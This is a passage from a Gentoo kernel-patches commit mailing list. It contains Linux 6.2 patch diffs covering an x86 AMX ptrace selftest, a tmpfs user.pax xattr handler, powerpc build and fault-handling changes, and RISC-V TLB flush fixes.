++	check_err $? "wrong overlimits, expected 10 got ${overlimits}"
++
++	tc filter del dev $h1 egress protocol ip pref 100 handle 100 flower
++	tc filter del dev $h1 egress protocol ip pref 101 handle 101 flower
++	tc filter del dev $h1 ingress protocol ip pref 102 handle 102 flower
++
++	rm -f $tmpfile $tmpfile1
++	log_test "mirred_egress_to_ingress_tcp ($tcflags)"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/x86/amx.c b/tools/testing/selftests/x86/amx.c
+index 625e42901237c..d884fd69dd510 100644
+--- a/tools/testing/selftests/x86/amx.c
++++ b/tools/testing/selftests/x86/amx.c
+@@ -14,8 +14,10 @@
+ #include <sys/auxv.h>
+ #include <sys/mman.h>
+ #include <sys/shm.h>
++#include <sys/ptrace.h>
+ #include <sys/syscall.h>
+ #include <sys/wait.h>
++#include <sys/uio.h>
+ 
+ #include "../kselftest.h" /* For __cpuid_count() */
+ 
+@@ -583,6 +585,13 @@ static void test_dynamic_state(void)
+ 	_exit(0);
+ }
+ 
++static inline int __compare_tiledata_state(struct xsave_buffer *xbuf1, struct xsave_buffer *xbuf2)
++{
++	return memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
++		      &xbuf2->bytes[xtiledata.xbuf_offset],
++		      xtiledata.size);
++}
++
+ /*
+  * Save current register state and compare it to @xbuf1.'
+  *
+@@ -599,9 +608,7 @@ static inline bool __validate_tiledata_regs(struct xsave_buffer *xbuf1)
+ 		fatal_error("failed to allocate XSAVE buffer\n");
+ 
+ 	xsave(xbuf2, XFEATURE_MASK_XTILEDATA);
+-	ret = memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
+-		     &xbuf2->bytes[xtiledata.xbuf_offset],
+-		     xtiledata.size);
++	ret = __compare_tiledata_state(xbuf1, xbuf2);
+ 
+ 	free(xbuf2);
+ 
+@@ -826,6 +833,99 @@ static void test_context_switch(void)
+ 	free(finfo);
+ }
+ 
++/* Ptrace test */
++
++/*
++ * Make sure the ptracee has the expanded kernel buffer on the first
++ * use. Then, initialize the state before performing the state
++ * injection from the ptracer.
++ */
++static inline void ptracee_firstuse_tiledata(void)
++{
++	load_rand_tiledata(stashed_xsave);
++	init_xtiledata();
++}
++
++/*
++ * Ptracer injects the randomized tile data state. It also reads
++ * before and after that, which will execute the kernel's state copy
++ * functions. So, the tester is advised to double-check any emitted
++ * kernel messages.
++ */
++static void ptracer_inject_tiledata(pid_t target)
++{
++	struct xsave_buffer *xbuf;
++	struct iovec iov;
++
++	xbuf = alloc_xbuf();
++	if (!xbuf)
++		fatal_error("unable to allocate XSAVE buffer");
++
++	printf("\tRead the init'ed tiledata via ptrace().\n");
++
++	iov.iov_base = xbuf;
++	iov.iov_len = xbuf_size;
++
++	memset(stashed_xsave, 0, xbuf_size);
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tThe init'ed tiledata was read from ptracee.\n");
++	else
++		printf("[FAIL]\tThe init'ed tiledata was not read from ptracee.\n");
++
++	printf("\tInject tiledata via ptrace().\n");
++
++	load_rand_tiledata(xbuf);
++
++	memcpy(&stashed_xsave->bytes[xtiledata.xbuf_offset],
++	       &xbuf->bytes[xtiledata.xbuf_offset],
++	       xtiledata.size);
++
++	if (ptrace(PTRACE_SETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_SETREGSET");
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tTiledata was correctly written to ptracee.\n");
++	else
++		printf("[FAIL]\tTiledata was not correctly written to ptracee.\n");
++}
++
++static void test_ptrace(void)
++{
++	pid_t child;
++	int status;
++
++	child = fork();
++	if (child < 0) {
++		err(1, "fork");
++	} else if (!child) {
++		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
++			err(1, "PTRACE_TRACEME");
++
++		ptracee_firstuse_tiledata();
++
++		raise(SIGTRAP);
++		_exit(0);
++	}
++
++	do {
++		wait(&status);
++	} while (WSTOPSIG(status) != SIGTRAP);
++
++	ptracer_inject_tiledata(child);
++
++	ptrace(PTRACE_DETACH, child, NULL, NULL);
++	wait(&status);
++	if (!WIFEXITED(status) || WEXITSTATUS(status))
++		err(1, "ptrace test");
++}
++
+ int main(void)
+ {
+ 	/* Check hardware availability at first */
+@@ -846,6 +946,8 @@ int main(void)
+ 	ctxtswtest_config.num_threads = 5;
+ 	test_context_switch();
+ 
++	test_ptrace();
++
+ 	clearhandler(SIGILL);
+ 	free_stashed_xsave();
+ 


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-29 23:09 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-29 23:09 UTC (permalink / raw
  To: gentoo-commits

commit:     1c3a77c0734cfe6d829f2f1d90577e46b4de1a8f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 29 23:08:27 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Mar 29 23:08:27 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1c3a77c0

Update namespace user.pax.* on tmpfs patch

Bug: https://bugs.gentoo.org/show_bug.cgi?id=903513

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1500_XATTR_USER_PREFIX.patch | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/1500_XATTR_USER_PREFIX.patch b/1500_XATTR_USER_PREFIX.patch
index fac3eed7..1d1a9301 100644
--- a/1500_XATTR_USER_PREFIX.patch
+++ b/1500_XATTR_USER_PREFIX.patch
@@ -26,12 +26,12 @@ the XATTR_PAX flags preserved.
 +#define XATTR_NAME_PAX_FLAGS XATTR_PAX_PREFIX XATTR_PAX_FLAGS_SUFFIX
  
  #endif /* _UAPI_LINUX_XATTR_H */
---- a/mm/shmem.c	2022-11-22 05:57:29.011626215 -0500
-+++ b/mm/shmem.c	2022-11-22 06:03:33.165939400 -0500
-@@ -3297,6 +3297,14 @@ static int shmem_xattr_handler_set(const
- 	struct shmem_inode_info *info = SHMEM_I(inode);
+--- a/mm/shmem.c	2023-03-29 18:54:52.431866914 -0400
++++ b/mm/shmem.c	2023-03-29 18:57:55.145689335 -0400
+@@ -3310,6 +3310,14 @@ static int shmem_xattr_handler_set(const
  	int err;
  
+ 	name = xattr_full_name(handler, name);
 +
 +	if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN)) {
 +		if (strcmp(name, XATTR_NAME_PAX_FLAGS))
@@ -40,10 +40,10 @@ the XATTR_PAX flags preserved.
 +			return -EINVAL;
 +	}
 +
- 	name = xattr_full_name(handler, name);
  	err = simple_xattr_set(&info->xattrs, name, value, size, flags, NULL);
  	if (!err) {
-@@ -3312,6 +3320,12 @@ static const struct xattr_handler shmem_
+ 		inode->i_ctime = current_time(inode);
+@@ -3324,6 +3332,12 @@ static const struct xattr_handler shmem_
  	.set = shmem_xattr_handler_set,
  };
  
@@ -56,7 +56,7 @@ the XATTR_PAX flags preserved.
  static const struct xattr_handler shmem_trusted_xattr_handler = {
  	.prefix = XATTR_TRUSTED_PREFIX,
  	.get = shmem_xattr_handler_get,
-@@ -3325,6 +3339,7 @@ static const struct xattr_handler *shmem
+@@ -3337,6 +3351,7 @@ static const struct xattr_handler *shmem
  #endif
  	&shmem_security_xattr_handler,
  	&shmem_trusted_xattr_handler,


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-22 16:10 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-03-22 16:10 UTC (permalink / raw
  To: gentoo-commits

commit:     9d6c7d6da33741e7aae39da8e1cff967ed5d3193
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 22 16:10:19 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Mar 22 16:10:19 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9d6c7d6d

Linux patch 6.2.8

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1007_linux-6.2.8.patch | 7735 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7739 insertions(+)

diff --git a/0000_README b/0000_README
index 110a64f7..a2d57d44 100644
--- a/0000_README
+++ b/0000_README
@@ -71,6 +71,10 @@ Patch:  1006_linux-6.2.7.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.7
 
+Patch:  1007_linux-6.2.8.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.8
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1007_linux-6.2.8.patch b/1007_linux-6.2.8.patch
new file mode 100644
index 00000000..e7c5754d
--- /dev/null
+++ b/1007_linux-6.2.8.patch
@@ -0,0 +1,7735 @@
+diff --git a/Documentation/filesystems/vfs.rst b/Documentation/filesystems/vfs.rst
+index 2c15e70531137..2f54e725bd743 100644
+--- a/Documentation/filesystems/vfs.rst
++++ b/Documentation/filesystems/vfs.rst
+@@ -1222,7 +1222,7 @@ defined:
+ 	return
+ 	-ECHILD and it will be called again in ref-walk mode.
+ 
+-``_weak_revalidate``
++``d_weak_revalidate``
+ 	called when the VFS needs to revalidate a "jumped" dentry.  This
+ 	is called when a path-walk ends at dentry that was not acquired
+ 	by doing a lookup in the parent directory.  This includes "/",
+diff --git a/Makefile b/Makefile
+index 43cf2c785cb1f..2c90d9b067f4a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 7
++SUBLEVEL = 8
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/loongarch/kernel/time.c b/arch/loongarch/kernel/time.c
+index a6576dea590c0..4351f69d99501 100644
+--- a/arch/loongarch/kernel/time.c
++++ b/arch/loongarch/kernel/time.c
+@@ -140,16 +140,17 @@ static int get_timer_irq(void)
+ 
+ int constant_clockevent_init(void)
+ {
+-	int irq;
+ 	unsigned int cpu = smp_processor_id();
+ 	unsigned long min_delta = 0x600;
+ 	unsigned long max_delta = (1UL << 48) - 1;
+ 	struct clock_event_device *cd;
+-	static int timer_irq_installed = 0;
++	static int irq = 0, timer_irq_installed = 0;
+ 
+-	irq = get_timer_irq();
+-	if (irq < 0)
+-		pr_err("Failed to map irq %d (timer)\n", irq);
++	if (!timer_irq_installed) {
++		irq = get_timer_irq();
++		if (irq < 0)
++			pr_err("Failed to map irq %d (timer)\n", irq);
++	}
+ 
+ 	cd = &per_cpu(constant_clockevent_device, cpu);
+ 
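Making "irq" static above means the timer interrupt is looked up once, on the first CPU through constant_clockevent_init(), instead of being re-resolved on every CPU. A small sketch of the init-once pattern (get_timer_irq() is a stand-in for the real lookup, and the flag handling is simplified):

#include <stdio.h>

static int get_timer_irq(void) { return 42; }	/* stand-in for the real lookup */

static void clockevent_init(void)
{
	static int irq, installed;

	if (!installed) {
		irq = get_timer_irq();
		installed = 1;
	}
	printf("cpu uses irq %d\n", irq);
}

int main(void)
{
	clockevent_init();
	clockevent_init();	/* second CPU: reuses the mapped irq */
	return 0;
}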
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 4fd630efe39d3..894d48cd04920 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -146,19 +146,6 @@ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option, $(MULTIPLEWORD))
+ 
+ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option,-mno-readonly-in-sdata)
+ 
+-ifdef CONFIG_PPC_BOOK3S_64
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power8
+-else
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power4
+-endif
+-CFLAGS-$(CONFIG_GENERIC_CPU) += $(call cc-option,-mtune=power10,	\
+-				  $(call cc-option,-mtune=power9,	\
+-				  $(call cc-option,-mtune=power8)))
+-else ifdef CONFIG_PPC_BOOK3E_64
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=powerpc64
+-endif
+-
+ ifdef CONFIG_FUNCTION_TRACER
+ CC_FLAGS_FTRACE := -pg
+ ifdef CONFIG_MPROFILE_KERNEL
+@@ -166,11 +153,12 @@ CC_FLAGS_FTRACE += -mprofile-kernel
+ endif
+ endif
+ 
+-CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
+-AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
++CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
++AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
+ 
+-CFLAGS-$(CONFIG_E5500_CPU) += $(call cc-option,-mcpu=e500mc64,-mcpu=powerpc64)
+-CFLAGS-$(CONFIG_E6500_CPU) += $(call cc-option,-mcpu=e6500,$(E5500_CPU))
++CFLAGS-$(CONFIG_POWERPC64_CPU) += $(call cc-option,-mtune=power10,	\
++				  $(call cc-option,-mtune=power9,	\
++				  $(call cc-option,-mtune=power8)))
+ 
+ asinstr := $(call as-instr,lis 9$(comma)foo@high,-DHAVE_AS_ATHIGH=1)
+ 
+@@ -213,10 +201,7 @@ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ # often slow when they are implemented at all
+ KBUILD_CFLAGS		+= $(call cc-option,-mno-string)
+ 
+-cpu-as-$(CONFIG_40x)		+= -Wa,-m405
+-cpu-as-$(CONFIG_44x)		+= -Wa,-m440
+ cpu-as-$(CONFIG_ALTIVEC)	+= $(call as-option,-Wa$(comma)-maltivec)
+-cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ 
+ # When using '-many -mpower4' gas will first try and find a matching power4
+ # mnemonic and failing that it will allow any valid mnemonic that GAS knows
+@@ -224,7 +209,6 @@ cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ # LLVM IAS doesn't understand either flag: https://github.com/ClangBuiltLinux/linux/issues/675
+ # but LLVM IAS only supports ISA >= 2.06 for Book3S 64 anyway...
+ cpu-as-$(CONFIG_PPC_BOOK3S_64)	+= $(call as-option,-Wa$(comma)-mpower4) $(call as-option,-Wa$(comma)-many)
+-cpu-as-$(CONFIG_PPC_E500MC)	+= $(call as-option,-Wa$(comma)-me500mc)
+ 
+ KBUILD_AFLAGS += $(cpu-as-y)
+ KBUILD_CFLAGS += $(cpu-as-y)
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index d32d95aea5d6f..295f76df13b55 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -39,13 +39,19 @@ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 $(LINUXINCLUDE)
+ 
+ ifdef CONFIG_PPC64_BOOT_WRAPPER
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64le
++BOOTCFLAGS	+= -m64
+ else
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64
++BOOTCFLAGS	+= -m32
+ endif
++
++ifdef CONFIG_TARGET_CPU_BOOL
++BOOTCFLAGS	+= -mcpu=$(CONFIG_TARGET_CPU)
++else ifdef CONFIG_PPC64_BOOT_WRAPPER
++ifdef CONFIG_CPU_LITTLE_ENDIAN
++BOOTCFLAGS	+= -mcpu=powerpc64le
+ else
+-BOOTCFLAGS	+= -m32 -mcpu=powerpc
++BOOTCFLAGS	+= -mcpu=powerpc64
++endif
+ endif
+ 
+ BOOTCFLAGS	+= -isystem $(shell $(BOOTCC) -print-file-name=include)
+diff --git a/arch/powerpc/mm/fault.c b/arch/powerpc/mm/fault.c
+index 2bef19cc1b98c..af46aa88422bf 100644
+--- a/arch/powerpc/mm/fault.c
++++ b/arch/powerpc/mm/fault.c
+@@ -271,11 +271,16 @@ static bool access_error(bool is_write, bool is_exec, struct vm_area_struct *vma
+ 	}
+ 
+ 	/*
+-	 * Check for a read fault.  This could be caused by a read on an
+-	 * inaccessible page (i.e. PROT_NONE), or a Radix MMU execute-only page.
++	 * VM_READ, VM_WRITE and VM_EXEC all imply read permissions, as
++	 * defined in protection_map[].  Read faults can only be caused by
++	 * a PROT_NONE mapping, or with a PROT_EXEC-only mapping on Radix.
+ 	 */
+-	if (unlikely(!(vma->vm_flags & VM_READ)))
++	if (unlikely(!vma_is_accessible(vma)))
+ 		return true;
++
++	if (unlikely(radix_enabled() && ((vma->vm_flags & VM_ACCESS_FLAGS) == VM_EXEC)))
++		return true;
++
+ 	/*
+ 	 * We should ideally do the vma pkey access check here. But in the
+ 	 * fault path, handle_mm_fault() also does the same check. To avoid
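A hedged sketch of the rewritten check, using the standard VM_* bit values (VM_READ=0x1, VM_WRITE=0x2, VM_EXEC=0x4): a PROT_NONE mapping fails the accessibility test, and on Radix an execute-only mapping must fault for reads too:

#include <stdio.h>

#define VM_READ  0x1u
#define VM_WRITE 0x2u
#define VM_EXEC  0x4u
#define VM_ACCESS_FLAGS (VM_READ | VM_WRITE | VM_EXEC)

static int read_access_error(unsigned int vm_flags, int radix)
{
	if (!(vm_flags & VM_ACCESS_FLAGS))	/* PROT_NONE: not accessible */
		return 1;
	if (radix && (vm_flags & VM_ACCESS_FLAGS) == VM_EXEC)
		return 1;			/* execute-only on Radix */
	return 0;
}

int main(void)
{
	/* prints "1 0": exec-only faults, readable does not */
	printf("%d %d\n", read_access_error(VM_EXEC, 1),
	       read_access_error(VM_READ, 1));
	return 0;
}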
+diff --git a/arch/powerpc/platforms/Kconfig.cputype b/arch/powerpc/platforms/Kconfig.cputype
+index 9563336e3348f..046b571496b13 100644
+--- a/arch/powerpc/platforms/Kconfig.cputype
++++ b/arch/powerpc/platforms/Kconfig.cputype
+@@ -118,19 +118,18 @@ endchoice
+ 
+ choice
+ 	prompt "CPU selection"
+-	default GENERIC_CPU
+ 	help
+ 	  This will create a kernel which is optimised for a particular CPU.
+ 	  The resulting kernel may not run on other CPUs, so use this with care.
+ 
+ 	  If unsure, select Generic.
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER5 and PowerPC 970 and above)"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
+ 	select PPC_64S_HASH_MMU
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER8 and above)"
+ 	depends on PPC_BOOK3S_64 && CPU_LITTLE_ENDIAN
+ 	select ARCH_HAS_FAST_MULTIPLIER
+@@ -144,6 +143,7 @@ config POWERPC_CPU
+ config CELL_CPU
+ 	bool "Cell Broadband Engine"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
++	depends on !CC_IS_CLANG
+ 	select PPC_64S_HASH_MMU
+ 
+ config PPC_970_CPU
+@@ -188,11 +188,13 @@ config E5500_CPU
+ config E6500_CPU
+ 	bool "Freescale e6500"
+ 	depends on PPC64 && PPC_E500
++	depends on !CC_IS_CLANG
+ 	select PPC_HAS_LBARX_LHARX
+ 
+ config 405_CPU
+ 	bool "40x family"
+ 	depends on 40x
++	depends on !CC_IS_CLANG
+ 
+ config 440_CPU
+ 	bool "440 (44x family)"
+@@ -201,22 +203,27 @@ config 440_CPU
+ config 464_CPU
+ 	bool "464 (44x family)"
+ 	depends on 44x
++	depends on !CC_IS_CLANG
+ 
+ config 476_CPU
+ 	bool "476 (47x family)"
+ 	depends on PPC_47x
++	depends on !CC_IS_CLANG
+ 
+ config 860_CPU
+ 	bool "8xx family"
+ 	depends on PPC_8xx
++	depends on !CC_IS_CLANG
+ 
+ config E300C2_CPU
+ 	bool "e300c2 (832x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config E300C3_CPU
+ 	bool "e300c3 (831x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config G4_CPU
+ 	bool "G4 (74xx)"
+@@ -233,13 +240,12 @@ config E500MC_CPU
+ 
+ config TOOLCHAIN_DEFAULT_CPU
+ 	bool "Rely on the toolchain's implicit default CPU"
+-	depends on PPC32
+ 
+ endchoice
+ 
+ config TARGET_CPU_BOOL
+ 	bool
+-	default !GENERIC_CPU && !TOOLCHAIN_DEFAULT_CPU
++	default !TOOLCHAIN_DEFAULT_CPU
+ 
+ config TARGET_CPU
+ 	string
+@@ -251,6 +257,10 @@ config TARGET_CPU
+ 	default "power8" if POWER8_CPU
+ 	default "power9" if POWER9_CPU
+ 	default "power10" if POWER10_CPU
++	default "e5500" if E5500_CPU
++	default "e6500" if E6500_CPU
++	default "power4" if POWERPC64_CPU && !CPU_LITTLE_ENDIAN
++	default "power8" if POWERPC64_CPU && CPU_LITTLE_ENDIAN
+ 	default "405" if 405_CPU
+ 	default "440" if 440_CPU
+ 	default "464" if 464_CPU
+diff --git a/arch/riscv/include/asm/mmu.h b/arch/riscv/include/asm/mmu.h
+index 5ff1f19fd45c2..0099dc1161683 100644
+--- a/arch/riscv/include/asm/mmu.h
++++ b/arch/riscv/include/asm/mmu.h
+@@ -19,8 +19,6 @@ typedef struct {
+ #ifdef CONFIG_SMP
+ 	/* A local icache flush is needed before user execution can resume. */
+ 	cpumask_t icache_stale_mask;
+-	/* A local tlb flush is needed before user execution can resume. */
+-	cpumask_t tlb_stale_mask;
+ #endif
+ } mm_context_t;
+ 
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 907b9efd39a87..801019381dea3 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -22,24 +22,6 @@ static inline void local_flush_tlb_page(unsigned long addr)
+ {
+ 	ALT_FLUSH_TLB_PAGE(__asm__ __volatile__ ("sfence.vma %0" : : "r" (addr) : "memory"));
+ }
+-
+-static inline void local_flush_tlb_all_asid(unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma x0, %0"
+-			:
+-			: "r" (asid)
+-			: "memory");
+-}
+-
+-static inline void local_flush_tlb_page_asid(unsigned long addr,
+-		unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma %0, %1"
+-			:
+-			: "r" (addr), "r" (asid)
+-			: "memory");
+-}
+-
+ #else /* CONFIG_MMU */
+ #define local_flush_tlb_all()			do { } while (0)
+ #define local_flush_tlb_page(addr)		do { } while (0)
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 80ce9caba8d22..0f784e3d307bb 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -196,16 +196,6 @@ switch_mm_fast:
+ 
+ 	if (need_flush_tlb)
+ 		local_flush_tlb_all();
+-#ifdef CONFIG_SMP
+-	else {
+-		cpumask_t *mask = &mm->context.tlb_stale_mask;
+-
+-		if (cpumask_test_cpu(cpu, mask)) {
+-			cpumask_clear_cpu(cpu, mask);
+-			local_flush_tlb_all_asid(cntx & asid_mask);
+-		}
+-	}
+-#endif
+ }
+ 
+ static void set_mm_noasid(struct mm_struct *mm)
+@@ -215,12 +205,24 @@ static void set_mm_noasid(struct mm_struct *mm)
+ 	local_flush_tlb_all();
+ }
+ 
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+-	if (static_branch_unlikely(&use_asid_allocator))
+-		set_mm_asid(mm, cpu);
+-	else
+-		set_mm_noasid(mm);
++	/*
++	 * The mm_cpumask indicates which harts' TLBs contain the virtual
++	 * address mapping of the mm. Compared to noasid, using asid
++	 * can't guarantee that stale TLB entries are invalidated because
++	 * the ASID mechanism doesn't flush the TLB on every switch_mm,
++	 * for performance. So when using ASIDs, keep every CPU's
++	 * footprint in mm_cpumask() until the mm is reset.
++	 */
++	cpumask_set_cpu(cpu, mm_cpumask(next));
++	if (static_branch_unlikely(&use_asid_allocator)) {
++		set_mm_asid(next, cpu);
++	} else {
++		cpumask_clear_cpu(cpu, mm_cpumask(prev));
++		set_mm_noasid(next);
++	}
+ }
+ 
+ static int __init asids_init(void)
+@@ -274,7 +276,8 @@ static int __init asids_init(void)
+ }
+ early_initcall(asids_init);
+ #else
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+ 	/* Nothing to do here when there is no MMU */
+ }
+@@ -327,10 +330,7 @@ void switch_mm(struct mm_struct *prev, struct mm_struct *next,
+ 	 */
+ 	cpu = smp_processor_id();
+ 
+-	cpumask_clear_cpu(cpu, mm_cpumask(prev));
+-	cpumask_set_cpu(cpu, mm_cpumask(next));
+-
+-	set_mm(next, cpu);
++	set_mm(prev, next, cpu);
+ 
+ 	flush_icache_deferred(next, cpu);
+ }
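
As a rough illustration of the cpumask bookkeeping described in the comment
above, here is a user-space toy (all names invented; a sketch of the idea,
not kernel code):

#include <stdbool.h>
#include <stdio.h>

struct toy_mm { unsigned long cpumask; };

/* With ASIDs, a hart that switches away may still hold tagged TLB
 * entries for the old mm, so its bit must stay set in the old mm's
 * cpumask for later shootdowns to reach it. Without ASIDs, every
 * switch does a full flush, so the bit can be dropped immediately. */
static void toy_switch_mm(struct toy_mm *prev, struct toy_mm *next,
			  int cpu, bool use_asid)
{
	next->cpumask |= 1UL << cpu;
	if (!use_asid)
		prev->cpumask &= ~(1UL << cpu);
}

int main(void)
{
	struct toy_mm a = { .cpumask = 1UL << 1 }, b = { 0 };

	toy_switch_mm(&a, &b, 1, true);
	printf("asid:   a=%#lx b=%#lx\n", a.cpumask, b.cpumask);

	a.cpumask = 1UL << 1;
	b.cpumask = 0;
	toy_switch_mm(&a, &b, 1, false);
	printf("noasid: a=%#lx b=%#lx\n", a.cpumask, b.cpumask);
	return 0;
}
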
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index eb0774d9c03b1..4b9953b47d81a 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -143,6 +143,8 @@ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long a
+ 		no_context(regs, addr);
+ 		return;
+ 	}
++	if (pud_leaf(*pud_k))
++		goto flush_tlb;
+ 
+ 	/*
+ 	 * Since the vmalloc area is global, it is unnecessary
+@@ -153,6 +155,8 @@ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long a
+ 		no_context(regs, addr);
+ 		return;
+ 	}
++	if (pmd_leaf(*pmd_k))
++		goto flush_tlb;
+ 
+ 	/*
+ 	 * Make sure the actual PTE exists as well to
+@@ -172,6 +176,7 @@ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long a
+ 	 * ordering constraint, not a cache flush; it is
+ 	 * necessary even after writing invalid entries.
+ 	 */
++flush_tlb:
+ 	local_flush_tlb_page(addr);
+ }
+ 
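
For context, the two added leaf checks short-circuit the synchronization
walk: a huge mapping at the PUD or PMD level has no lower-level table to
validate, so only the flush remains. A rough user-space sketch of that
control flow, with invented names and three fixed levels assumed:

#include <stdbool.h>
#include <stdio.h>

struct ent { bool present, leaf; };

static void toy_vmalloc_sync(struct ent *pud, struct ent *pmd, struct ent *pte)
{
	if (!pud->present)
		return;		/* nothing mapped at this address */
	if (pud->leaf)
		goto flush;	/* gigantic page: no PMD table below */

	if (!pmd->present)
		return;
	if (pmd->leaf)
		goto flush;	/* huge page: no PTE table below */

	if (!pte->present)
		return;
flush:
	puts("local_flush_tlb_page(addr)");
}

int main(void)
{
	struct ent pud = { true, true }, pmd = { 0 }, pte = { 0 };

	toy_vmalloc_sync(&pud, &pmd, &pte);	/* leaf at PUD: flushes */
	return 0;
}
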
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index ce7dfc81bb3fe..37ed760d007c3 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -5,7 +5,23 @@
+ #include <linux/sched.h>
+ #include <asm/sbi.h>
+ #include <asm/mmu_context.h>
+-#include <asm/tlbflush.h>
++
++static inline void local_flush_tlb_all_asid(unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma x0, %0"
++			:
++			: "r" (asid)
++			: "memory");
++}
++
++static inline void local_flush_tlb_page_asid(unsigned long addr,
++		unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma %0, %1"
++			:
++			: "r" (addr), "r" (asid)
++			: "memory");
++}
+ 
+ void flush_tlb_all(void)
+ {
+@@ -15,7 +31,6 @@ void flush_tlb_all(void)
+ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 				  unsigned long size, unsigned long stride)
+ {
+-	struct cpumask *pmask = &mm->context.tlb_stale_mask;
+ 	struct cpumask *cmask = mm_cpumask(mm);
+ 	unsigned int cpuid;
